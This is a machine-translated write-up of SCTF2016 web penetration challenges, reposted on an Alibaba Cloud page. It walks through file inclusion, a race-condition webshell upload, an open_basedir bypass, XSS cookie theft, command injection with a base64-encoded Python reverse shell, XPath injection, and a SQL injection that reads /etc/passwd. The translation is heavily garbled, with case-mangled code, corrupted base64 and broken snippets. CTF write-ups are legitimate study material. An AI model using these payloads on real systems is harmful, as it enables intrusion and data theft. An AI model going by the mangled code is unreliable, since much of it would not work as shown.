SCTF2016 the painful infiltration of the road

Source: Internet
Author: User
Tags glob openlog phpinfo symlink administrator password contact form

SCTF2016 the painful infiltration of the road

0x00 Preface

This time the CTF play very sour, a total of 7 web penetration of the topic, this is the beginning of pain. A good jury, for him so many high door threshold.

0x01 pentest-homework-200

http://homework.sctf.xctf.org.cn/

Open full, is the landing page, entered the registration. Name, age, upload pictures.

After landing, a picture was displayed. There's also a homework link.

Click Homework after the link is a well-wrapped web site.

Http://homework.sctf.xctf.org.cn/homework.php?homework=homework.txt

It is possible to determine that this is a file that contains holes in the hole. Try on a piece of wooden horse to include.

Inevitably, the inclusion is unsuccessful.

Read the source code to look at the function of what is the problem.

http://homework.sctf.xctf.org.cn/homework.php?homework=php://filter/convert.base64-encode/resource=index.php

Successfully read the results. Then the source code that you read is all download down.

Through the jury code

if (isset ($_post[' upload ')) {$filename = $_files[' uploaded ' [' name ']; $filetype = $_files[' uploaded '] [' type '];$ FileSize = $_files[' uploaded ' [' Size ']; $tmpname = $_files[' uploaded ' [' Tmp_name ']; $uploaddir = './upload/'; $target _ Path = $uploaddir. basename ($filename); $fileext = substr (STRRCHR ($filename, "."), 1); if (($fileext = = ' gif ') && ($ filetype = = "Image/gif") {    {        if (Move_uploaded_file ($tmpname, $target _path))        {        }    }    $im = Imagecreatefromgif ($target _path);    Srand (Time ());    $newfilename = Strval (rand ()). ". GIF ";    $newimagepath = $uploaddir. $newfilename;    Imagegif ($im, $newimagepath);    Unlink ($target _path);} else if (($fileext = = ' jpg ') && ($filetype = = "Image/jpeg")) {...

There is a bit of meaning, the upload of the picture has been through the imagecreatefromgif and other functions.

But this is not a heavy point, the point is the front move_uploaded_file ($tmpname, $target _path)

Familiar with the PHP code should know, but has been successfully on the map.

After the success of the upload and then the deal and delete the source file unlink ($target _path);.

So, this topic is the time competition, the network speed, spell character.

Upload a picture of the Shell's foot

Fputs (fopen (Base64_decode (Dmlylnboca), W), Base64_decode (pd9wahagqgv2ywwojf9qt1nuwyd2axjpbmsnxsk7pz4tls0t));

Brup Multi-thread interview

Http://homework.sctf.xctf.org.cn/homework.php?homework=upload/virink.jpg

Registration is on the leaflet. If the character is good, it will succeed soon.

Later, found that the shell of the writing is not puzzling, the eyes of someone stirring excrement, and then I wrote to/tmp. 2333333

Webshell success, but found that many of the functions have been oxen cut off.

ddisable_functions= passthru,exec,phpinfo,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_ Status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,pcntl_ Exec

Then you use PHP to bypass the Open_basedir list of black tech listings.

virink=printf ('
', Ini_get (' Open_basedir ')); $file _list = Array (); $it = new Directoryiterator ("glob:////home/wwwroot/default/web/*"); foreach ($it as $f) { $file _list[] = $f->__tostring ();} $it = new Directoryiterator ("glob:///.*"), foreach ($it as $f) { $file _list[] = $f->__tostring ();} Sort ($file _list); foreach ($file _list as $f) {echo "{$f}
";}

And then you read flag.

Virink=echo file_get_contents ('/home/wwwroot/default/web/4ff692fb12aa996e27f0a108bfc386c2 ');

Sctf{g00d_good_stu6y}

0x02 pentest-sycshell-200

http://58.213.63.27:61180

Right-click to view source codes

 
  

Change the hosts, then use the domain name to visit.

Re-open the source code, decrypt the Jsfuck encoded, get

/w0ca1n1caibuda0/read.php?f=index

The code is included in the design.

Source code:

 
  15? Die ("Don t Hack me!"): "";        if (!is_numeric ($pass) | | | preg_match ('/0 (x)? | -|\+|\s|^ (\.| \d) (*$/i ', $pass)) {die        (' error ');    }        if ($pass = = 1 &&  $a [$pass] = = = "S") {        $file = isset ($_get[' F '])? $_get[' F ']. php ': ' index.php ';        @include $file;    }? >

Here's a big brain hole!!!! There is a version limit.

According to the hint: sycshell_tip audit that part of a good look at the bottom of PHP code, but also convenient for everyone 58.213.63.27:61180/phpinfo.php

You can get the PHP 5.3.29 version first.

Version vulnerability,%0B (\v) can be around the \s

/?pass=%0b.1e1

PHP bottom-Layer source codes

while (*str = = "| | *str = = ' \ t ' | | *str = = ' \ n ' | | *str = = ' \ r ' | | *str = ' \v ' | | *str = ' \f ') {    str++;    length--;}

The purpose of this problem is another brain hole is phpinfo () +lfi

And then it's the demolition, 2333

$pass around this brain and the Phithon cow.

Https://www.leavesongs.com/PENETRATION/some-sangebaimao-ctf-writeups.html?lan=tw&lan=tw&lan=tw

Topic Three: PHP type and logic +fuzz and source code audit *0x03 function attributes cause the bypass * section.

0x03 pentest-drugmarket1-300

Drug market:http://www.spentest.com/

Beginning is a brain hole, hypocrites 404 Not Found page. I have eaten this thanks, and then silently look at the source code, the point of the hidden link.

http://drug.spentest.com/

Click order to submit the numbers and then nothing else. There may be XSS.

I continued to look at the source code, and there was a link to discover.

http://msgboard.spentest.com/

Open the page and jump directly to

http://msgboard.spentest.com/index.php?action=login.php

It is obvious that a file contains a vulnerability. There were no places to be seen.

After studying the features of the page, the customer is logged in, and after the user name and contact form is found, there is a session. and the user name and contact is not discard.

The initial sentence is to include the session. The habit contains/tmp/sess_xxxxxxxxxx, and discovery does not exist. It's definitely a change of place.

Then you need to find the address where the session is stored. First you have to read the Apache configuration file.

Http://msgboard.spentest.com/index.php?action=../../../../../../../../etc/httpd/conf/httpd.conf

Get

 
  
   ServerAdmin syclover documentroot/var/www/html 
   
    assignuserid Apache Apache Php_value s Ession.save_path "/var/lib/php/session"
    

  
 
 
  
   ServerAdmin syclover ServerName www.spentest.com documentroot/var/www/webhosts/www 
   
    as Signuserid www www php_value session.save_path "/var/lib/php/session_www"
    

  
 
 
  
   ServerAdmin syclover ServerName drug.spentest.com documentroot/var/www/webhosts/drug 
   
     Assignuserid drug drug Php_value Session.save_path "/var/lib/php/session_drug"
    

  
 
 
  
   ServerAdmin syclover ServerName msgboard.spentest.com documentroot/var/www/webhosts/msgboard 
   
     Assignuserid msgboard Msgboard php_value session.save_path "/var/lib/php/session_msgboard" 

   
  
 

To know that the session's storage address is/var/lib/php/session_msgboard

Username or contact to write in

http://msgboard.spentest.com/index.php?action=. /.. /.. /.. /.. /.. /.. /.. /var/lib/php/session_msgboard/sess_rb2rbfrie8rku2n81dq52vghp0

And then it's a step forward to gather information.

Virink=phpinfo ()

Get

Disable_functions=passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen, Ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server

No other stations have permission to read the source code of this site silently. Get the data from the repository.

Because this topic has been FB, silently to collect the information of the former my life. /TMP catalogue is my favorite ... 23333

Looking at a whole bunch of useless things, I also got some useful stuff, like the root code of MySQL. 23333

When the brain was pumped, it was not well preserved, and the MySQL data library was not found after the/TMP was somehow emptied.

Thinking in the end, never know how to execute the command.

Anti-relapse Research tips

    1. This is a seepage problem yo, so please don't be trapped in your current shell, try to infiltrate the drug site
    2. Firewall rules are more stringent in order to bring the topic closer to the real world

And finally went back to XSS. Because of the drug of the library, there is no management user table.

Orderx to X to no effect, and then in the case of a small companion, x into Adminconfig, successfully gaining cookie!

Enter the admin page and discover the functionality of a download image. The Service Manager listens to a port, and the server visits its own service, which is fruitless.

Or at the tips of a small partner, listen to Port 80. Only to discover that tip 2 is this brain hole.

Then you receive a wget request.

The presence of a command to execute a vulnerability.

Black tech: $IFS instead of spaces

Upload an anti-ballistic py-toe

Virink=fputs (fopen ('/tmp/vvv.py ', W), Base64_decode ( aw1wb3j0ihnvy2tldcxzdwjwcm9jzxnzlg9zdqpzpxnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsc29ja2v0llnpq0tfu1rsrufnkq0kcy5jb25uzwn0k Cginduunzgumtmumjmildgwkskncm9zlmr1cdiocy5mawxlbm8okswwkq0kb3muzhvwmihzlmzpbgvubygpldepdqpvcy5kdxaykhmuzmlszw5vkcksmikncn A9C3VICHJVY2VZCY5JYWXSKFSIL2JPBI9IYXNOIIWILWKIXSK7DQO));

And then execute the command.

http://vvv/flag.jpg;python$ifs/tmp/vvv.py

Successful to get a bash shell.

Finally found Flag1.txt in/home/drug.

SCTF{B68181AF58BDF261714942F0D1A823BE}

0x04 pentest-eto-200

http://eto.sctf.xctf.org.cn/

This is the first problem to be released, but it is the last to totem out.

Simply try, there is an injection.

And then the injections were unsuccessful.

The official tip of the flower:

ETO-related no more trying to blow it up ha, besides, hint has been

From head to tail there is no discovery of where hint is.

After the end, it was discovered that when the bug was injected, a hint://user[id=1 was returned in the response.

The problem is that the brain is forced to give 101 points, full of 100, one point is deep Father love.

At the tips of my little buddy, we know this is an XPath injection.

The citation was discard, but the official tip 2 says make good use of existing characters.

It is stated that the characters in the password exist in username, email, and role. Use the substring () function to judge the characters by character.

Http://eto.sctf.xctf.org.cn/?action=user&id=1 and substring (//user[1]/username,1,1) =substring (//user[1]/ password,1,1)

Use your artifact burp again to burst the wave.

Finally run out of 32-digit password: ywj@4791.d_gtowdmceu.eali0s2yarn

You can get flag when you land.

SCTF{0F61CE4EB984A4A6D3AAA31F779533DF}

0x05 pentest-hackme-300-not successful

http://hackme.sctf.xctf.org.cn

Tuo Tuo will not do, or inject. Injection has always been my weakness. Orz ...

According to the official tips

1. Web developers often go to see memos

2. Find a way to get the administrator password

3. Watch the database connection method

4.XSS

and tips from small partners: PDO injection.

Baidu get: PDO Way of database connection, can insert injection.

Toss it to make a appearance.

Http://hackme.sctf.xctf.org.cn/index.php?id=0;/*!50000insert*//*!50000into*/beiwanglu (id,time,event)/*! 50000values*/(9, ' Virink ',/*!50000select*/(/*!50000hex*/(/*!50000load_file*/(0x2f6574632f706173737764)));%23

Success X to the administrator's cookie ...

Then follow the instructions to find the administrator password can probably know that the next step may be to hijack the form, get the administrator's password.

However, I would not have.

XSS is more slag-~~orz than SQL injection .....

0x06 written at the end

Finally, the 0x01-0x04+ check-in score of 10 points of 910 points to end the CTF.

The brain hole is still not big enough, experience is too little. And he's stupid. A lot of key places and non-critical places are caught in the wrong thinking, no small partner tips, I would be able to take a 10 points of the sign.

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.